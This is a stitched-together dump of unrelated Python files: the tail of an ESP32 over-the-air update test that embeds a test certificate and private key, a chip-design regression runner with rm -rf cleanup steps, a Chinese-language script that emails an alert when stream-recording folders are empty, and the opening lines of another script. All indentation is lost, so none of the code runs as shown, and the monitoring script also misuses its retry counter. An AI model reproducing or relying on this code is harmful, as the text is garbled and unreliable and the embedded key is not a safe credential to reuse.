'VQQLDANFU1AxDDAKBgNVBAMMA0VTUDEaMBgGCSqGSIb3DQEJARYLZXNwQGVzcC5j\n'\
'b20wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDhxF/y7bygndxPwiWL\n'\
'SwS9LY3uBMaJgup0ufNKVhx+FhGQOu44SghuJAaH3KkPUnt6SOM8jC97/yQuc32W\n'\
'ukI7eBZoA12kargSnzdv5m5rZZpd+NznSSpoDArOAONKVlzr25A1+aZbix2mKRbQ\n'\
'S5w9o1N2BriQuSzd8gL0Y0zEk3VkOWXEL+0yFUT144HnErnD+xnJtHe11yPO2fEz\n'\
'YaGiilh0ddL26PXTugXMZN/8fRVHP50P2OG0SvFpC7vghlLp4VFM1/r3UJnvL6Oz\n'\
'3ALc6dhxZEKQucqlpj8l1UegszQToopemtIj0qXTHw2+uUnkUyWIPjPC+wdOAoap\n'\
'rFTRAgMBAAEwDQYJKoZIhvcNAQELBQADggEBAItw24y565k3C/zENZlxyzto44ud\n'\
'IYPQXN8Fa2pBlLe1zlSIyuaA/rWQ+i1daS8nPotkCbWZyf5N8DYaTE4B0OfvoUPk\n'\
'B5uGDmbuk6akvlB5BGiYLfQjWHRsK9/4xjtIqN1H58yf3QNROuKsPAeywWS3Fn32\n'\
'3//OpbWaClQePx6udRYMqAitKR+QxL7/BKZQsX+UyShuq8hjphvXvk0BW8ONzuw9\n'\
'RcoORxM0FzySYjeQvm4LhzC/P3ZBhEq0xs55aL2a76SJhq5hJy7T/Xz6NFByvlrN\n'\
'lFJJey33KFrAf5vnV9qcyWFIo7PYy2VsaaEjFeefr7q3sTFSMlJeadexW2Y=\n'\
'-----END CERTIFICATE-----\n'
server_key = '-----BEGIN PRIVATE KEY-----\n'\
'MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQDhxF/y7bygndxP\n'\
'wiWLSwS9LY3uBMaJgup0ufNKVhx+FhGQOu44SghuJAaH3KkPUnt6SOM8jC97/yQu\n'\
'c32WukI7eBZoA12kargSnzdv5m5rZZpd+NznSSpoDArOAONKVlzr25A1+aZbix2m\n'\
'KRbQS5w9o1N2BriQuSzd8gL0Y0zEk3VkOWXEL+0yFUT144HnErnD+xnJtHe11yPO\n'\
'2fEzYaGiilh0ddL26PXTugXMZN/8fRVHP50P2OG0SvFpC7vghlLp4VFM1/r3UJnv\n'\
'L6Oz3ALc6dhxZEKQucqlpj8l1UegszQToopemtIj0qXTHw2+uUnkUyWIPjPC+wdO\n'\
'AoaprFTRAgMBAAECggEAE0HCxV/N1Q1h+1OeDDGL5+74yjKSFKyb/vTVcaPCrmaH\n'\
'fPvp0ddOvMZJ4FDMAsiQS6/n4gQ7EKKEnYmwTqj4eUYW8yxGUn3f0YbPHbZT+Mkj\n'\
'z5woi3nMKi/MxCGDQZX4Ow3xUQlITUqibsfWcFHis8c4mTqdh4qj7xJzehD2PVYF\n'\
'gNHZsvVj6MltjBDAVwV1IlGoHjuElm6vuzkfX7phxcA1B4ZqdYY17yCXUnvui46z\n'\
'Xn2kUTOOUCEgfgvGa9E+l4OtdXi5IxjaSraU+dlg2KsE4TpCuN2MEVkeR5Ms3Y7Q\n'\
'jgJl8vlNFJDQpbFukLcYwG7rO5N5dQ6WWfVia/5XgQKBgQD74at/bXAPrh9NxPmz\n'\
'i1oqCHMDoM9sz8xIMZLF9YVu3Jf8ux4xVpRSnNy5RU1gl7ZXbpdgeIQ4v04zy5aw\n'\
'8T4tu9K3XnR3UXOy25AK0q+cnnxZg3kFQm+PhtOCKEFjPHrgo2MUfnj+EDddod7N\n'\
'JQr9q5rEFbqHupFPpWlqCa3QmQKBgQDldWUGokNaEpmgHDMnHxiibXV5LQhzf8Rq\n'\
'gJIQXb7R9EsTSXEvsDyqTBb7PHp2Ko7rZ5YQfyf8OogGGjGElnPoU/a+Jij1gVFv\n'\
'kZ064uXAAISBkwHdcuobqc5EbG3ceyH46F+FBFhqM8KcbxJxx08objmh58+83InN\n'\
'P9Qr25Xw+QKBgEGXMHuMWgQbSZeM1aFFhoMvlBO7yogBTKb4Ecpu9wI5e3Kan3Al\n'\
'pZYltuyf+VhP6XG3IMBEYdoNJyYhu+nzyEdMg8CwXg+8LC7FMis/Ve+o7aS5scgG\n'\
'1to/N9DK/swCsdTRdzmc/ZDbVC+TuVsebFBGYZTyO5KgqLpezqaIQrTxAoGALFCU\n'\
'10glO9MVyl9H3clap5v+MQ3qcOv/EhaMnw6L2N6WVT481tnxjW4ujgzrFcE4YuxZ\n'\
'hgwYu9TOCmeqopGwBvGYWLbj+C4mfSahOAs0FfXDoYazuIIGBpuv03UhbpB1Si4O\n'\
'rJDfRnuCnVWyOTkl54gKJ2OusinhjztBjcrV1XkCgYEA3qNi4uBsPdyz9BZGb/3G\n'\
'rOMSw0CaT4pEMTLZqURmDP/0hxvTk1polP7O/FYwxVuJnBb6mzDa0xpLFPTpIAnJ\n'\
'YXB8xpXU69QVh+EBbemdJWOd+zp5UCfXvb2shAeG3Tn/Dz4cBBMEUutbzP+or0nG\n'\
'vSXnRLaxQhooWm+IuX9SuBQ=\n'\
'-----END PRIVATE KEY-----\n'
def get_my_ip():
s1 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s1.connect(('8.8.8.8', 80))
my_ip = s1.getsockname()[0]
s1.close()
return my_ip
def get_server_status(host_ip, port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_status = sock.connect_ex((host_ip, port))
sock.close()
if server_status == 0:
return True
return False
def create_file(server_file, file_data):
with open(server_file, 'w+') as file:
file.write(file_data)
def get_ca_cert(ota_image_dir):
os.chdir(ota_image_dir)
server_file = os.path.join(ota_image_dir, 'server_cert.pem')
create_file(server_file, server_cert)
key_file = os.path.join(ota_image_dir, 'server_key.pem')
create_file(key_file, server_key)
return server_file, key_file
def https_request_handler():
"""
Returns a request handler class that handles broken pipe exception
"""
class RequestHandler(http.server.SimpleHTTPRequestHandler):
def finish(self):
try:
if not self.wfile.closed:
self.wfile.flush()
self.wfile.close()
except socket.error:
pass
self.rfile.close()
def handle(self):
try:
http.server.BaseHTTPRequestHandler.handle(self)
except socket.error:
pass
return RequestHandler
def start_https_server(ota_image_dir, server_ip, server_port):
server_file, key_file = get_ca_cert(ota_image_dir)
requestHandler = https_request_handler()
httpd = http.server.HTTPServer((server_ip, server_port), requestHandler)
httpd.socket = ssl.wrap_socket(httpd.socket,
keyfile=key_file,
certfile=server_file, server_side=True)
httpd.serve_forever()
def start_chunked_server(ota_image_dir, server_port):
server_file, key_file = get_ca_cert(ota_image_dir)
chunked_server = subprocess.Popen(['openssl', 's_server', '-WWW', '-key', key_file, '-cert', server_file, '-port', str(server_port)])
return chunked_server
@ttfw_idf.idf_example_test(env_tag='EXAMPLE_ETH_OTA')
def test_examples_protocol_native_ota_example(env, extra_data):
"""
This is a positive test case, which downloads complete binary file multiple number of times.
Number of iterations can be specified in variable iterations.
steps: |
1. join AP
2. Fetch OTA image over HTTPS
3. Reboot with the new OTA image
"""
dut1 = env.get_dut('native_ota_example', 'examples/system/ota/native_ota_example', dut_class=ttfw_idf.ESP32DUT)
server_port = 8002
# No. of times working of application to be validated
iterations = 3
# File to be downloaded. This file is generated after compilation
bin_name = 'native_ota.bin'
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('native_ota_bin_size', '{}KB'.format(bin_size // 1024))
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = multiprocessing.Process(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
dut1.start_app()
for i in range(iterations):
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
ip_address = dut1.expect(re.compile(r' (sta|eth) ip: ([^,]+),'), timeout=30)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
thread1.terminate()
dut1.expect('Starting OTA example', timeout=30)
print('writing to device: {}'.format('https://' + host_ip + ':' + str(server_port) + '/' + bin_name))
dut1.write('https://' + host_ip + ':' + str(server_port) + '/' + bin_name)
dut1.expect('Loaded app from partition at offset', timeout=60)
dut1.expect('Starting OTA example', timeout=30)
dut1.reset()
thread1.terminate()
@ttfw_idf.idf_example_test(env_tag='EXAMPLE_ETH_OTA')
def test_examples_protocol_native_ota_example_truncated_bin(env, extra_data):
"""
Working of OTA if binary file is truncated is validated in this test case.
Application should return with error message in this case.
steps: |
1. join AP
2. Generate truncated binary file
3. Fetch OTA image over HTTPS
4. Check working of code if bin is truncated
"""
dut1 = env.get_dut('native_ota_example', 'examples/system/ota/native_ota_example', dut_class=ttfw_idf.ESP32DUT)
server_port = 8002
# Original binary file generated after compilation
bin_name = 'native_ota.bin'
# Truncated binary file to be generated from original binary file
truncated_bin_name = 'truncated.bin'
# Size of truncated file to be grnerated. This value can range from 288 bytes (Image header size) to size of original binary file
# truncated_bin_size is set to 64000 to reduce consumed by the test case
truncated_bin_size = 64000
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
f = open(binary_file, 'rb+')
fo = open(os.path.join(dut1.app.binary_path, truncated_bin_name), 'wb+')
fo.write(f.read(truncated_bin_size))
fo.close()
f.close()
binary_file = os.path.join(dut1.app.binary_path, truncated_bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('native_ota_bin_size', '{}KB'.format(bin_size // 1024))
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = multiprocessing.Process(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
dut1.start_app()
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
ip_address = dut1.expect(re.compile(r' (sta|eth) ip: ([^,]+),'), timeout=60)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
thread1.terminate()
dut1.expect('Starting OTA example', timeout=30)
print('writing to device: {}'.format('https://' + host_ip + ':' + str(server_port) + '/' + truncated_bin_name))
dut1.write('https://' + host_ip + ':' + str(server_port) + '/' + truncated_bin_name)
dut1.expect('native_ota_example: Image validation failed, image is corrupted', timeout=20)
os.remove(binary_file)
thread1.terminate()
@ttfw_idf.idf_example_test(env_tag='EXAMPLE_ETH_OTA')
def test_examples_protocol_native_ota_example_truncated_header(env, extra_data):
"""
Working of OTA if headers of binary file are truncated is vaildated in this test case.
Application should return with error message in this case.
steps: |
1. join AP
2. Generate binary file with truncated headers
3. Fetch OTA image over HTTPS
4. Check working of code if headers are not sent completely
"""
dut1 = env.get_dut('native_ota_example', 'examples/system/ota/native_ota_example', dut_class=ttfw_idf.ESP32DUT)
server_port = 8002
# Original binary file generated after compilation
bin_name = 'native_ota.bin'
# Truncated binary file to be generated from original binary file
truncated_bin_name = 'truncated_header.bin'
# Size of truncated file to be grnerated. This value should be less than 288 bytes (Image header size)
truncated_bin_size = 180
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
f = open(binary_file, 'rb+')
fo = open(os.path.join(dut1.app.binary_path, truncated_bin_name), 'wb+')
fo.write(f.read(truncated_bin_size))
fo.close()
f.close()
binary_file = os.path.join(dut1.app.binary_path, truncated_bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('native_ota_bin_size', '{}KB'.format(bin_size // 1024))
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = multiprocessing.Process(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
dut1.start_app()
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
ip_address = dut1.expect(re.compile(r' (sta|eth) ip: ([^,]+),'), timeout=60)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
thread1.terminate()
dut1.expect('Starting OTA example', timeout=30)
print('writing to device: {}'.format('https://' + host_ip + ':' + str(server_port) + '/' + truncated_bin_name))
dut1.write('https://' + host_ip + ':' + str(server_port) + '/' + truncated_bin_name)
dut1.expect('native_ota_example: received package is not fit len', timeout=20)
os.remove(binary_file)
thread1.terminate()
@ttfw_idf.idf_example_test(env_tag='EXAMPLE_ETH_OTA')
def test_examples_protocol_native_ota_example_random(env, extra_data):
"""
Working of OTA if random data is added in binary file are validated in this test case.
Magic byte verification should fail in this case.
steps: |
1. join AP
2. Generate random binary image
3. Fetch OTA image over HTTPS
4. Check working of code for random binary file
"""
dut1 = env.get_dut('native_ota_example', 'examples/system/ota/native_ota_example', dut_class=ttfw_idf.ESP32DUT)
server_port = 8002
# Random binary file to be generated
random_bin_name = 'random.bin'
# Size of random binary file. 32000 is choosen, to reduce the time required to run the test-case
random_bin_size = 32000
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, random_bin_name)
fo = open(binary_file, 'wb+')
# First byte of binary file is always set to zero. If first byte is generated randomly,
# in some cases it may generate 0xE9 which will result in failure of testcase.
fo.write(struct.pack('B', 0))
for i in range(random_bin_size - 1):
fo.write(struct.pack('B', random.randrange(0,255,1)))
fo.close()
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('native_ota_bin_size', '{}KB'.format(bin_size // 1024))
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = multiprocessing.Process(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
dut1.start_app()
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
ip_address = dut1.expect(re.compile(r' (sta|eth) ip: ([^,]+),'), timeout=60)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
thread1.terminate()
dut1.expect('Starting OTA example', timeout=30)
print('writing to device: {}'.format('https://' + host_ip + ':' + str(server_port) + '/' + random_bin_name))
dut1.write('https://' + host_ip + ':' + str(server_port) + '/' + random_bin_name)
dut1.expect('esp_ota_ops: OTA image has invalid magic byte', timeout=20)
os.remove(binary_file)
thread1.terminate()
@ttfw_idf.idf_example_test(env_tag='EXAMPLE_ETH_OTA')
def test_examples_protocol_native_ota_example_chunked(env, extra_data):
"""
This is a positive test case, which downloads complete binary file multiple number of times.
Number of iterations can be specified in variable iterations.
steps: |
1. join AP
2. Fetch OTA image over HTTPS
3. Reboot with the new OTA image
"""
dut1 = env.get_dut('native_ota_example', 'examples/system/ota/native_ota_example', dut_class=ttfw_idf.ESP32DUT)
# File to be downloaded. This file is generated after compilation
bin_name = 'native_ota.bin'
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('native_ota_bin_size', '{}KB'.format(bin_size // 1024))
# start test
host_ip = get_my_ip()
chunked_server = start_chunked_server(dut1.app.binary_path, 8070)
dut1.start_app()
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
ip_address = dut1.expect(re.compile(r' (sta|eth) ip: ([^,]+),'), timeout=30)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
dut1.expect('Starting OTA example', timeout=30)
print('writing to device: {}'.format('https://' + host_ip + ':8070/' + bin_name))
dut1.write('https://' + host_ip + ':8070/' + bin_name)
dut1.expect('Loaded app from partition at offset', timeout=60)
dut1.expect('Starting OTA example', timeout=30)
chunked_server.kill()
os.remove(os.path.join(dut1.app.binary_path, 'server_cert.pem'))
os.remove(os.path.join(dut1.app.binary_path, 'server_key.pem'))
if __name__ == '__main__':
test_examples_protocol_native_ota_example()
test_examples_protocol_native_ota_example_chunked()
test_examples_protocol_native_ota_example_truncated_bin()
test_examples_protocol_native_ota_example_truncated_header()
test_examples_protocol_native_ota_example_random()
|
run_designs.py | # Copyright 2020 Efabless Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import queue
import sys
import time
import subprocess
import threading
import logging
import datetime
import argparse
import os
import copy
from collections import OrderedDict
from scripts.report.report import Report
from scripts.config.config import ConfigHandler
import scripts.utils.utils as utils
parser = argparse.ArgumentParser(
description="Regression test on designs")
parser.add_argument('--config_tag', '-c', action='store', default='config',
help="config file")
parser.add_argument('--regression', '-r', action='store', default=None,
help="regression file")
parser.add_argument('--designs', '-d', nargs='+', default=['spm'],
help="designs to run")
parser.add_argument('--tag', '-t', action='store', default='regression',
help="tag the log file")
parser.add_argument('--threads', '-th', action='store', type=int, default=5,
help="number of designs in parallel")
parser.add_argument('--configuration_parameters', '-cp', action='store', default=None,
help="file containing configuration parameters to write in report, to report all possible configurations add: all ")
parser.add_argument('--append_configurations', '-app', action='store_true', default=False,
help="append configuration parameters provided to the existing default printed configurations")
parser.add_argument('--clean', '-cl', action='store_true', default=False,
help="cleans all intermediate files in runs")
parser.add_argument('--delete', '-dl', action='store_true', default=False,
help="deletes the whole run directory upon completion leaving only the final_report.txt file")
parser.add_argument('--tarList', '-tar', nargs='+', default=None,
help="tars the specified sub directories and deletes the whole directory leaving only the compressed version")
parser.add_argument('--htmlExtract', '-html', action='store_true', default=False,
help="An option to extract an html summary of the final csv summary")
parser.add_argument('--defaultTestSet', '-dts', action='store_true', default=False,
help="Runs the default test set (all designs under ./designs/) to generate the regression sheet")
parser.add_argument('--excluded_designs', '-e', nargs='+', default=[],
help="designs to exclude from the run")
parser.add_argument('--benchmark', '-b', action='store', default=None,
help="benchmark report file to compare with")
parser.add_argument('--print_rem', '-p', action='store', default=None,
help="Takes a time period, and prints the list of remaining designs periodically based on it")
parser.add_argument('--disable_timestamp', '-dt',action='store_true', default=False,
help="Disables appending the timestamp to the file names and tags.")
parser.add_argument('--show_output', '-so',action='store_true', default=False,
help="Enables showing the ./flow.tcl output into the stdout. If more than one design/more than one configuration is run, this flag will be treated as False, even if specified otherwise.")
args = parser.parse_args()
regression = args.regression
tag = args.tag
if args.defaultTestSet:
designs= [x for x in os.listdir('./designs/')]
for i in designs:
if os.path.isdir('./designs/'+i) == False:
designs.remove(i)
else:
designs = list(OrderedDict.fromkeys(args.designs))
excluded_designs = list(OrderedDict.fromkeys(args.excluded_designs))
for excluded_design in excluded_designs:
if excluded_design in designs:
designs.remove(excluded_design)
show_log_output = args.show_output & (len(designs) == 1) & (args.regression is None)
if args.print_rem is not None and show_log_output == False:
if float(args.print_rem) > 0:
mutex = threading.Lock()
print_rem_time = float(args.print_rem)
else:
print_rem_time = None
else:
print_rem_time = None
if print_rem_time is not None:
rem_designs = dict.fromkeys(designs, 1)
num_workers = args.threads
config = args.config_tag
tarList = ['']
if args.tarList is not None:
tarList = list(OrderedDict.fromkeys(args.tarList))
if args.regression is not None:
regressionConfigurationsList = []
regressionFileOpener = open(regression,"r")
regressionFileContent = regressionFileOpener.read().split()
regressionFileOpener.close()
for k in regressionFileContent:
if k.find("=") == -1:
continue
if k.find("extra") != -1:
break
else:
regressionConfigurationsList.append(k.split("=")[0])
if len(regressionConfigurationsList):
ConfigHandler.update_configuration_values(regressionConfigurationsList,True)
if args.configuration_parameters is not None:
if args.configuration_parameters == "all":
ConfigHandler.update_configuration_values_to_all(args.append_configurations)
else:
try:
tmpFile = open(args.configuration_parameters,"r")
if tmpFile.mode == 'r':
configuration_parameters = tmpFile.read().split(",")
ConfigHandler.update_configuration_values(configuration_parameters,args.append_configurations)
except OSError:
print ("Could not open/read file:", args.configuration_parameters)
sys.exit()
store_dir = ""
report_file_name = ""
if args.disable_timestamp:
store_dir = "./regression_results/{tag}/".format(tag=tag)
report_file_name = "{store_dir}/{tag}".format(store_dir=store_dir,tag=tag)
else:
store_dir = "./regression_results/{tag}_{date}/".format(tag=tag, date=datetime.datetime.now().strftime('%d_%m_%Y_%H_%M'))
report_file_name = "{store_dir}/{tag}_{date}".format(store_dir=store_dir,tag=tag, date=datetime.datetime.now().strftime('%d_%m_%Y_%H_%M'))
if os.path.exists(store_dir) == False:
os.makedirs(store_dir, exist_ok=True)
log = logging.getLogger("log")
log_formatter = logging.Formatter('[%(asctime)s - %(levelname)5s] %(message)s')
handler1 = logging.FileHandler("{report_file_name}.log".format(report_file_name=report_file_name), 'w')
handler1.setFormatter(log_formatter)
log.addHandler(handler1)
handler2 = logging.StreamHandler()
handler2.setFormatter(log_formatter)
log.addHandler(handler2)
log.setLevel(logging.INFO)
report_log = logging.getLogger("report_log")
report_formatter = logging.Formatter('%(message)s')
report_handler = logging.FileHandler("{report_file_name}.csv".format(report_file_name=report_file_name), 'w')
report_handler.setFormatter(report_formatter)
report_log.addHandler(report_handler)
report_log.setLevel(logging.INFO)
report_log.info(Report.get_header() + "," + ConfigHandler.get_header())
allow_print_rem_designs = False
def printRemDesignList():
t = threading.Timer(print_rem_time, printRemDesignList)
t.start()
if allow_print_rem_designs:
print("Remaining designs (design, # of times): ",rem_designs)
if len(rem_designs) == 0:
t.cancel()
def rmDesignFromPrintList(design):
if design in rem_designs.keys():
mutex.acquire()
try:
rem_designs[design]-=1
if rem_designs[design] == 0:
rem_designs.pop(design)
finally:
mutex.release()
if print_rem_time is not None:
printRemDesignList()
allow_print_rem_designs = True
def run_design(designs_queue):
while not designs_queue.empty():
design, config, tag,design_name= designs_queue.get(timeout=3) # 3s timeout
run_path = utils.get_run_path(design=design, tag=tag)
command = './flow.tcl -design {design} -tag {tag} -overwrite -disable_output -config_tag {config} -no_save'.format(design=design,tag=tag, config=config)
log.info('{design} {tag} running'.format(design=design, tag=tag))
command = ""
if show_log_output:
command = './flow.tcl -design {design} -tag {tag} -overwrite -config_tag {config} -no_save'.format(design=design,tag=tag, config=config)
else:
command = './flow.tcl -design {design} -tag {tag} -overwrite -disable_output -config_tag {config} -no_save'.format(design=design,tag=tag, config=config)
skip_rm_from_rems = False
try:
if show_log_output:
process = subprocess.Popen(command.split(), stderr=subprocess.PIPE, stdout=subprocess.PIPE)
while True:
output = process.stdout.readline()
if not output:
break
if output:
print (str(output.strip())[2:-1])
else:
subprocess.check_output(command.split(), stderr=subprocess.PIPE)
except subprocess.CalledProcessError as e:
if print_rem_time is not None:
rmDesignFromPrintList(design)
skip_rm_from_rems = True
error_msg = e.stderr.decode(sys.getfilesystemencoding())
log.error('{design} {tag} failed check {run_path}error.txt'.format(design=design, run_path=run_path, tag=tag))
with open(run_path + "error.txt", "w") as error_file:
error_file.write(error_msg)
if print_rem_time is not None and not skip_rm_from_rems:
rmDesignFromPrintList(design)
log.info('{design} {tag} finished\t Writing report..'.format(design=design, tag=tag))
params = ConfigHandler.get_config(design, tag)
report = Report(design, tag, design_name,params).get_report()
report_log.info(report)
with open(run_path + "final_report.txt", "w") as report_file:
report_file.write(Report.get_header() + "," + ConfigHandler.get_header())
report_file.write("\n")
report_file.write(report)
if args.benchmark is not None:
try:
log.info('{design} {tag} Comparing vs benchmark results..'.format(design=design, tag=tag))
design_benchmark_comp_cmd = "python3 scripts/compare_regression_design.py -b {benchmark} -r {this_run} -o {output_report} -d {design} -rp {run_path}".format(
benchmark=args.benchmark,
this_run=report_file_name + ".csv",
output_report=report_file_name + "_design_test_report.csv",
design=design,
run_path=run_path
)
subprocess.check_output(design_benchmark_comp_cmd.split())
except subprocess.CalledProcessError as e:
error_msg = e.stderr.decode(sys.getfilesystemencoding())
log.error('{design} {tag} failed to compare with benchmark: {error_msg}'.format(design=design, tag=tag, error_msg=error_msg))
if args.clean:
try:
log.info('{design} {tag} Cleaning tmp Directory..'.format(design=design, tag=tag))
moveUnPadded_cmd = "cp {run_path}/tmp/merged_unpadded.lef {run_path}/results/".format(
run_path=run_path,
tag=tag
)
subprocess.check_output(moveUnPadded_cmd.split())
clean_cmd = "rm -rf {run_path}/tmp/".format(
run_path=run_path,
tag=tag
)
subprocess.check_output(clean_cmd.split())
log.info('{design} {tag} Cleaning tmp Directory Finished'.format(design=design, tag=tag))
except subprocess.CalledProcessError as e:
error_msg = e.stderr.decode(sys.getfilesystemencoding())
log.error('{design} {tag} failed to clean the tmp directory: {error_msg}'.format(design=design, tag=tag, error_msg=error_msg))
if tarList[0] != "":
log.info('{design} {tag} Compressing Run Directory..'.format(design=design, tag=tag))
try:
if 'all' in tarList:
tarAll_cmd = "tar -cvzf {run_path}../{design_name}_{tag}.tar.gz {run_path}".format(
run_path=run_path,
design_name=design_name,
tag=tag
)
subprocess.check_output(tarAll_cmd.split())
else:
tarString = "tar -cvzf {run_path}../{design_name}_{tag}.tar.gz"
for dirc in tarList:
tarString+= " {run_path}"+dirc
tar_cmd = tarString.format(
run_path=run_path,
design_name=design_name,
tag=tag
)
subprocess.check_output(tar_cmd.split())
log.info('{design} {tag} Compressing Run Directory Finished'.format(design=design, tag=tag))
except subprocess.CalledProcessError as e:
log.info('{design} {tag} Compressing Run Directory Failed'.format(design=design, tag=tag))
if args.delete:
try:
log.info('{design} {tag} Deleting Run Directory..'.format(design=design, tag=tag))
deleteDirectory = "rm -rf {run_path}".format(
run_path=run_path
)
subprocess.check_output(deleteDirectory.split())
log.info('{design} {tag} Deleting Run Directory Finished..'.format(design=design, tag=tag))
except subprocess.CalledProcessError as e:
error_msg = e.stderr.decode(sys.getfilesystemencoding())
log.error('{design} {tag} failed to delete the run directory: {error_msg}'.format(design=design, tag=tag, error_msg=error_msg))
que = queue.Queue()
total_runs = 0
if regression is not None:
regression_file = os.path.join(os.getcwd(), regression)
number_of_configs=0
for design in designs:
base_path = utils.get_design_path(design=design)
if base_path is None:
log.error("{design} not found, skipping...".format(design=design))
if print_rem_time is not None:
if design in rem_designs.keys():
rem_designs.pop(design)
continue
design_name= utils.get_design_name(design, config)
if design_name.startswith("[INVALID]:"):
log.error('{design} will not Run, {reason}'.format(design=design, reason=design_name))
continue
base_config_path=base_path+"base_config.tcl"
ConfigHandler.gen_base_config(design, base_config_path)
gen_config_cmd="./scripts/config/generate_config.sh {base_config} {output_path} config_{tag} {regression_file}".format(
base_config=base_config_path,
output_path=base_path,
tag=tag,
regression_file=regression_file
)
number_of_configs = subprocess.check_output(gen_config_cmd.split())
number_of_configs = int(number_of_configs.decode(sys.getdefaultencoding()))
total_runs = total_runs + number_of_configs
if print_rem_time is not None:
rem_designs[design] = number_of_configs
for i in range(number_of_configs):
config_tag = "config_{tag}_{idx}".format(
tag=tag,
idx=i
)
config_file = "{base_path}/{config_tag}".format(
base_path=base_path,
config_tag=config_tag,
)
que.put((design, config_tag, config_tag,design_name))
else:
for design in designs:
base_path = utils.get_design_path(design=design)
if base_path is None:
log.error("{design} not found, skipping...".format(design=design))
if print_rem_time is not None:
if design in rem_designs.keys():
rem_designs.pop(design)
continue
default_config_tag = "config_{tag}".format(tag=tag)
design_name= utils.get_design_name(design, config)
if design_name.startswith("[INVALID]:"):
log.error('{design} Will not Run, {reason}'.format(design=design, reason=design_name))
continue
que.put((design, config, default_config_tag,design_name))
workers = []
for i in range(num_workers):
workers.append(threading.Thread(target=run_design, args=(que,)))
workers[i].start()
for i in range(num_workers):
while workers[i].isAlive() == True:
workers[i].join(100)
print("Exiting thread", i)
log.info("Getting top results..")
best_result_cmd = "python3 ./scripts/report/get_best.py -i {input} -o {output}".format(
input=report_handler.baseFilename,
output=report_file_name + "_best.csv"
)
subprocess.check_output(best_result_cmd.split())
if args.htmlExtract:
log.info("Converting to html..")
csv2html_result_cmd = "python3 ./scripts/csv2html/csv2html.py -i {input} -o {output}".format(
input=report_file_name + ".csv",
output=report_file_name + ".html"
)
subprocess.check_output(csv2html_result_cmd.split())
csv2besthtml_result_cmd = "python3 ./scripts/csv2html/csv2html.py -i {input} -o {output}".format(
input=report_file_name + "_best.csv",
output=report_file_name + "_best.html"
)
subprocess.check_output(csv2besthtml_result_cmd.split())
utils.addComputedStatistics(report_file_name + ".csv")
utils.addComputedStatistics(report_file_name + "_best.csv")
if args.benchmark is not None:
log.info("Generating final benchmark results..")
full_benchmark_comp_cmd = "python3 scripts/compare_regression_reports.py -ur -b {benchmark} -r {this_run} -o {output_report} -x {output_xlsx}".format(
benchmark=args.benchmark,
this_run=report_file_name + ".csv",
output_report=report_file_name + "_benchmark_written_report.rpt",
output_xlsx=report_file_name + "_benchmark_final_report.xlsx"
)
subprocess.check_output(full_benchmark_comp_cmd.split())
log.info("Done")
|
douyustatus.py | from mail import send_mail
import os,time,sys
from threading import Thread
password = input("pass:")
filepath = "/root/b/d/d"
filepath2 = "/root/b/d/huya"
filepath3 = '/root/b/d'
subject = "斗鱼没文件"
subject2 = "虎牙没文件"
subject3 = 'bilibili没文件'
contents = "没有录制文件了,可能出错了,请检查"
retry = 0
def running(filepath,subject,contents,password):
while True:
t = time.strftime('%c',time.localtime(time.time()))
sys.stdout.write("\r{}检查文件中 当前时间{}".format(filepath,t))
files = os.listdir(filepath)
if not files:
send_mail(subject,contents,password)
time.sleep(60)
retry = retry + 1
if retry >= 10:
retry = 0
time.sleep(3600)
else:
retry = 0
time.sleep(60)
a=Thread(target=running,args=(filepath,subject,contents,password,),name=('douyu'))
b=Thread(target=running,args=(filepath2,subject2,contents,password,),name=('huya'))
c=Thread(target=running,args=(filepath3,subject3,contents,password,),name=('bili'))
a.start()
b.start()
c.start()
a.join()
b.join()
c.join()
|
replay.py | #!/usr/bin/env python
# Author:
# Rudiger Birkner (ETH Zurich)
import argparse
import logging
import time
import redis
